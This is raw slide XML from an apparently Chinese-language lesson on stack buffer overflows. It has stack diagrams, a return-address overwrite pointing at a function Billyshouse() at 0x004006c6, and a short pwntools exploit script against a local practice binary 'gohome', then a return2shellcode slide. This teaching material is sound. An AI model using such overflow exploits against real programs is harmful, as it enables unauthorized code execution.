            <a:off x="1751574" y="4303366"/>
            <a:ext cx="5106113" cy="695422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2817978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7719627B-7E4E-4D8C-98D9-0E3683F7E85C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="523783" y="1331651"/>
            <a:ext cx="4078110" cy="3520476"/>
            <a:chOff x="1890944" y="1271771"/>
            <a:chExt cx="3483306" cy="2846253"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="群組 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC97821-D711-4C6F-9D2E-5D3313957D54}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3195592" y="1271771"/>
              <a:ext cx="2178658" cy="2846253"/>
              <a:chOff x="1870947" y="2325642"/>
              <a:chExt cx="2178658" cy="2846253"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="矩形 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F001E448-4FCE-4581-BDD0-D1C66F0283EA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1870948" y="4543742"/>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RETURN ADDRESS</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="矩形 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE8547F7-3F9B-4C6E-B79C-0509A5A1FC7D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1870948" y="3870357"/>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Saved </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
                  <a:t>rbp</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="矩形 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8B8C5B-9307-452B-95C0-314860FB6FB3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1870947" y="2325642"/>
                <a:ext cx="2178657" cy="14994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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="文字方塊 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{036ECA26-AAD9-4DF9-9F27-61A7FFE57789}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2610035" y="1845358"/>
              <a:ext cx="1303519" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
                <a:t>0x20</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文字方塊 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB2E4350-033D-454F-82DE-40047814F39C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2610035" y="2913257"/>
              <a:ext cx="1303519" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
                <a:t>0x8</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="直線接點 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DD66D8-3A3A-4E30-9376-8E3705F1FEA9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1890944" y="1271771"/>
              <a:ext cx="1304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2C7946CD-E32A-4B4C-A887-0AFDCFE9ABD4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1890944" y="2766120"/>
              <a:ext cx="1304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DA3A17F1-0EA7-459E-B21E-27A01AD78FAB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1890944" y="3441156"/>
              <a:ext cx="130464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線單箭頭接點 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4430D53F-BFA5-4571-BFE3-4A2FB512D8AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4802819" y="1331651"/>
            <a:ext cx="0" cy="26712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674EE9ED-DBB7-4BF9-8B06-915E93974E83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5003746" y="1331651"/>
            <a:ext cx="4394447" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>saved rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的位置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文字方塊 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C903D763-0512-4C13-ADE7-C5BFDFCCCB67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6495054" y="3756941"/>
            <a:ext cx="3421299" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Return TO FUNCTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="直線單箭頭接點 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F45BA7-CAAB-4495-874C-DF82F77AAF5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2361460" y="4463652"/>
            <a:ext cx="40659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6810A529-5041-45B2-8311-E9A3736C824A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6495054" y="4144241"/>
            <a:ext cx="3421301" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0"/>
              <a:t>Billyshouse()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文字方塊 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23B6C819-5514-4098-93EA-E25B3FB7D90D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051211" y="4870965"/>
            <a:ext cx="9144740" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>return address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>處填入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>Billyshouse()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函式的位址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文字方塊 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15EC06F4-8111-462F-AD6E-44F3241DC376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051211" y="5235942"/>
            <a:ext cx="6094520" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Billyshouse()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>函式的位址 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0x004006c6</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD4341A9-DA60-4B43-B3D3-040CAEF47562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="59507" b="36811"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2128718" y="5570156"/>
            <a:ext cx="5466468" cy="154905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289844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F85BB-17EB-48C9-B15F-8FCA51C861C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文字版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DB18C1-273E-4D60-B2DA-BED1F54971CA}"/>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550111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6E82BF-5EF3-4849-AAB6-3DE8D2C14692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" cap="none" dirty="0"/>
              <a:t>exploit code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4651FA16-AB94-412D-942C-5A6FD8C7486C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>from pwn import * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 載入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>pwntool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>套件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r = process('./gohome’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>讀取檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r.sendlineafter("?",b"a"*40+p64(0x004006c6))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>號之後填入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>RETURN ADDRESS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的位置填上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Billyshouse()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>r.interactive()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4243637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01870-4A45-401A-AF1B-65BC765E1D19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>return2shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文字版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78F68D90-844A-424B-AD06-FB54B879F5E3}"/>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7490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0F4B1705-A71A-4A35-9088-1FE2ADFCD2F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="747944" y="927247"/>
            <a:ext cx="2178660" cy="4117828"/>
            <a:chOff x="492980" y="1057854"/>
            <a:chExt cx="2178660" cy="4126396"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7E28EC5-61F0-44D7-A8C2-8D55F525B2FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="492983" y="4556097"/>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RETURN ADDRESS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98ED0B4F-C794-4290-997D-D4A509777C7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="492983" y="3882712"/>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Saved </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
                <a:t>rbp</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A31C309-53C2-4066-B63A-A1A1E793FD4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="492982" y="3339547"/>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8AFFC7D5-14DB-4815-8CE2-319DEE4EAF1F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="492982" y="2879208"/>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BD90DA91-FD1A-47AB-B64D-BC80846027DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="492982" y="2425130"/>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602F4671-FAD8-4699-9024-5C4B94D2DF6C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="492981" y="1964791"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{337421B8-397D-44EA-B194-C437A4E5A0A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="492981" y="1518193"/>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buffer</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEC976C8-2FE5-43E6-BE5E-2147EF7E3599}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="492980" y="1057854"/>
              <a:ext cx="2178657" cy="3775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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直線單箭頭接點 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA4B91C-098B-4EB8-9217-36A482E7CD97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3224602" y="927247"/>
            <a:ext cx="0" cy="34458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9BB405BB-1CD5-416E-B88E-99D2DCB811CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
